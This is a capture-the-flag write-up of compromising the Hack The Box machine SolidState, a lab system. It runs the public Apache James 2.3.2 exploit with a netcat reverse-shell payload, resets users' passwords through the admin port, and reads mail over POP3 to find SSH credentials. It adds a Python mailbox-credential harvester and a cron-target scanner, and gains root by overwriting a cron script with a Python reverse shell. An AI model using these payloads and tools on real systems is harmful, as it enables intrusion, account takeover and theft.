HTB: SolidState

Details

This machine is SolidState from Hack The Box

Recon

root@kali:~# nmap -sV -p- -T4 10.10.10.51
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-01 14:10 EDT
Nmap scan report for 10.10.10.51
Host is up (0.038s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp        JAMES smtpd 2.3.2
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.66 seconds

User

Apache James 2.3.2 has a published remote code execution exploit, https://www.exploit-db.com/exploits/35513. It logs in to the remote admin port with the default root:root credentials, creates a user whose name is a directory traversal path ending in /etc/bash_completion.d, and then mails that user, so James writes the message as a file into a directory that bash sources on every interactive login; whatever the message body contains then runs as the user who logs in. I updated the payload in the script to be

nc 10.10.14.15 4444 -e /bin/bash

And ran it

root@kali:~# python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

So I started a listener in case it fires at some point

root@kali:~# nc -nlvp 4444

I checked the site on port 80

[Screenshot 1: the website on port 80]

And then I tried the James remote admin port myself using the default creds (root:root)

root@kali:~# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id: root
Password: root
Welcome root. HELP for a list of commands

I could log in, so I listed the users

listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin

The `../../../../../../../../etc/bash_completion.d` entry is the fake user the exploit script created a minute ago. The admin tool lets you set any user's password without knowing the current one, so I reset the passwords of the real accounts (this is destructive: on a real engagement the original passwords are gone and the owners will notice)

setpassword james james
Password for james reset

setpassword thomas thomas
Password for thomas reset

setpassword john john
Password for john reset

setpassword mindy mindy
Password for mindy reset

I then logged in to each mailbox over POP3 to check for mail

root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass john
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.

So mindy might have been sent a temporary password in her mail

root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass mindy
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.

So the credentials are

mindy:P@55W0rd1!2@
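The admin-port and POP3 steps above, as an added example of how I would script them on the next box like this. This is my own code, not the exploit script from exploit-db and not anything from the original writeup. It assumes the passwords have already been reset on port 4555 as shown above and that POP3 is exposed in the clear on 110; the two sample transcripts embedded in it are constructed from the output on this page, and `traversal_users` is the defender's side of the same story: a James "user" whose name is a path is a sign that the traversal exploit has already been run against the server.

```python
import poplib
import re

# Constructed "listusers" reply in the shape shown above (admin port 4555); the
# odd entry is the traversal "user" that the EDB-35513 exploit creates.
SAMPLE_LISTUSERS = """Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
"""

# Constructed POP3 RETR reply modelled on mindy's mail above (shortened).
SAMPLE_RETR = """+OK Message follows
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

username: mindy
pass: P@55W0rd1!2@
.
"""

def parse_listusers(text):
    """Usernames from a 'listusers' reply (lines of the form 'user: name')."""
    return [line.split("user: ", 1)[1].strip()
            for line in text.splitlines() if line.startswith("user: ")]

def traversal_users(users):
    """Usernames that are really paths: James keeps each mailbox in a directory
    named after the user, so such an entry means the exploit has been run."""
    return [u for u in users if "/" in u or "\\" in u or ".." in u]

def parse_retr(reply):
    """Split a POP3 RETR reply into (headers, body): handles the '+OK' line,
    folded header continuations, dot-stuffed body lines and the final '.'."""
    lines = reply.splitlines()
    if not lines or not lines[0].startswith("+OK"):
        raise ValueError("POP3 error: %r" % (lines[:1],))
    lines = lines[1:]
    if lines[-1:] == ["."]:
        lines.pop()
    headers, body, last, in_body = {}, [], None, False
    for line in lines:
        if in_body:
            body.append(line[1:] if line.startswith("..") else line)
        elif line == "":
            in_body = True
        elif line[0] in " \t" and last:
            headers[last] += " " + line.strip()
        elif ":" in line:
            key, value = line.split(":", 1)
            last = key.strip().lower()
            headers[last] = value.strip()
        else:  # not a header: body started without a blank line (John's mail)
            in_body = True
            body.append(line)
    return headers, "\n".join(body)

def find_credentials(body):
    """(username, password) pairs written as 'username: x' / 'pass: y' lines."""
    users = re.findall(r"^\s*(?:username|user|login)\s*:\s*(\S+)", body, re.I | re.M)
    passwords = re.findall(r"^\s*pass(?:word)?\s*:\s*(\S+)", body, re.I | re.M)
    return list(zip(users, passwords))

def pop3_fetch_all(host, user, password, port=110):
    """Log in over plain POP3 (as the box exposes it) and return
    (headers, body) for every message in the mailbox."""
    m = poplib.POP3(host, port, timeout=10)
    try:
        m.user(user)
        m.pass_(password)
        messages = []
        for i in range(1, m.stat()[0] + 1):
            resp, lines, _ = m.retr(i)
            raw = b"\n".join([resp] + lines + [b"."]).decode(errors="replace")
            messages.append(parse_retr(raw))
        return messages
    finally:
        m.quit()

if __name__ == "__main__":  # after 'setpassword mindy mindy' on the admin port
    for headers, body in pop3_fetch_all("10.10.10.51", "mindy", "mindy"):
        print(headers.get("subject"), find_credentials(body))
```

The parsers are deliberately tolerant of the two quirks visible in the mails above: folded `Received:` continuation lines, and John's message, where the body starts straight after `Subject:` with no blank line.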

I tried them over SSH

root@kali:~# ssh mindy@10.10.10.51
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
[SNIP]

So my terminal was full of noise. This is the exploit firing: mindy's login shell is rbash (which matches the "your access is restricted" mail), and bash sources every file in /etc/bash_completion.d when an interactive shell starts. The file James wrote there is a serialized MailImpl object with the message embedded in it, so most of its lines just produce "command not found", but the line holding the nc payload runs as mindy. Back in my listener

connect to [10.10.14.15] from (UNKNOWN) [10.10.10.51] 54776

A shell had been fired back. It runs as whoever triggered the login, mindy, but because nc spawned /bin/bash directly it is not subject to the rbash restrictions

id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

So I upgraded it to a proper pty

python -c "import pty;pty.spawn('/bin/bash')"
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 

With a nicer shell, I grabbed the user flag

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la
total 28
drwxr-x--- 4 mindy mindy 4096 Sep  8  2017 .
drwxr-xr-x 4 root  root  4096 Aug 22  2017 ..
-rw-r--r-- 1 root  root     0 Aug 22  2017 .bash_history
-rw-r--r-- 1 root  root     0 Aug 22  2017 .bash_logout
-rw-r--r-- 1 root  root   338 Aug 22  2017 .bash_profile
-rw-r--r-- 1 root  root  1001 Aug 22  2017 .bashrc
drwxr-x--- 2 mindy mindy 4096 Aug 22  2017 bin
-rw------- 1 root  root     0 Aug 22  2017 .rhosts
-rw------- 1 root  root     0 Aug 22  2017 .shosts
drw------- 2 root  root  4096 Aug 22  2017 .ssh
-rw------- 1 mindy mindy   33 Sep  8  2017 user.txt

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
[REDACTED]

Root

Looking for a way to escalate, I searched for world-writable files

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find / -perm -2 -type f 2>/dev/null
/opt/tmp.py
[SNIP]

So I took a look

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cd /opt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -la
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Jun 18  2017 ..
drwxr-xr-x 11 root root 4096 Aug 22  2017 james-2.3.2
-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

The script just empties /tmp, but it is world-writable and owned by root, so if something privileged runs it on a schedule I get code execution as that user. As mindy I can't read root's crontab to confirm, so I overwrote it with a Python reverse shell and waited to see whether a cron job picks it up
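A check I would run before overwriting the script, added here as my own example and not taken from the writeup: cross-reference the cron entries an unprivileged user can normally read (/etc/crontab and /etc/cron.d/* are usually world-readable, unlike root's own crontab under /var/spool/cron) with files that are world-writable or otherwise writable by the current user. The crontab text embedded in it is constructed; the writeup never shows the real schedule that runs /opt/tmp.py, so the interval below is made up.

```python
import os
import re
import shlex
import stat

# Constructed /etc/crontab-style text. The writeup does not show the real
# schedule for /opt/tmp.py; the interval below is made up for the example.
SAMPLE_CRONTAB = """# m h dom mon dow user  command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/3 *   * * *   root    python /opt/tmp.py
@reboot         root    /usr/local/bin/start-things.sh
"""

SPECIAL = re.compile(r"^@(reboot|yearly|annually|monthly|weekly|daily|hourly)$")
ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")

def parse_system_crontab(text):
    """Yield (schedule, user, command) from system-crontab text (/etc/crontab,
    /etc/cron.d/*), which carries a user field. Skips comments, blank lines and
    VAR=value assignments; accepts 5-field schedules and @reboot shortcuts."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ASSIGNMENT.match(line):
            continue
        parts = line.split()
        n = 1 if SPECIAL.match(parts[0]) else 5
        if len(parts) < n + 2:
            continue  # malformed entry
        yield " ".join(parts[:n]), parts[n], line.split(None, n + 1)[n + 1]

def command_paths(command):
    """Absolute paths a cron command line references: the script or binary it
    runs and any absolute-path arguments. Shell operators are left out, and so
    are bare names like 'python' that resolve through PATH."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    return [t for t in tokens if t.startswith("/") and t != "/"]

def is_world_writable(path):
    """The same test as 'find / -perm -2': the other-write bit is set."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False

def is_writable_by_me(path):
    """Writable by the current user through any route (owner, group, ACL)."""
    return os.access(path, os.W_OK)

def writable_cron_targets(crontab_text, check=None):
    """[(schedule, user, path)] for every path a cron entry runs or touches that
    passes `check`. 'user' is who cron runs it as, so a root entry pointing at
    a file I can write is a privilege escalation."""
    check = check or (lambda p: is_world_writable(p) or is_writable_by_me(p))
    return [(schedule, user, path)
            for schedule, user, command in parse_system_crontab(crontab_text)
            for path in command_paths(command) if check(path)]

def scan_system(extra_files=()):
    """Scan the crontabs an unprivileged user can normally read."""
    files = ["/etc/crontab"]
    try:
        files += [os.path.join("/etc/cron.d", f) for f in sorted(os.listdir("/etc/cron.d"))]
    except OSError:
        pass
    hits = []
    for f in files + list(extra_files):
        try:
            with open(f) as fh:
                hits += writable_cron_targets(fh.read())
        except OSError:
            continue
    return hits

if __name__ == "__main__":
    for schedule, user, path in scan_system():
        print("%-14s %-8s %s" % (schedule, user, path))
```

When root's crontab is not readable, as on this box, the scan can come back empty even though the job exists; the fallback is exactly what the writeup does, plant the payload and wait. A writable directory on the list (for example a cron.hourly directory) is just as useful as a writable script, since run-parts executes whatever is dropped there.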

root@kali:~# nc -nlvp 5555

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /opt/tmp.py

And after a bit of waiting

connect to [10.10.14.15] from (UNKNOWN) [10.10.10.51] 60444
/bin/sh: 0: can't access tty; job control turned off
# 

A shell came back, so I checked who I was

# id
uid=0(root) gid=0(root) groups=0(root)

It was a root shell. So I grabbed my flag

# cd /root
# ls -la
total 56
drwx------  8 root root 4096 Sep  8  2017 .
drwxr-xr-x 22 root root 4096 Jun 18  2017 ..
-rw-------  1 root root    1 Dec 23  2017 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  8 root root 4096 Aug 22  2017 .cache
drwx------ 10 root root 4096 Aug 22  2017 .config
drwx------  3 root root 4096 Aug 22  2017 .gnupg
-rw-------  1 root root 2946 Sep  8  2017 .ICEauthority
drwx------  3 root root 4096 Aug 22  2017 .local
drwxr-xr-x  2 root root 4096 Aug 22  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   33 Aug 22  2017 root.txt
-rw-r--r--  1 root root   66 Aug 22  2017 .selected_editor
drwx------  2 root root 4096 Aug 22  2017 .ssh

# cat root.txt
[REDACTED]
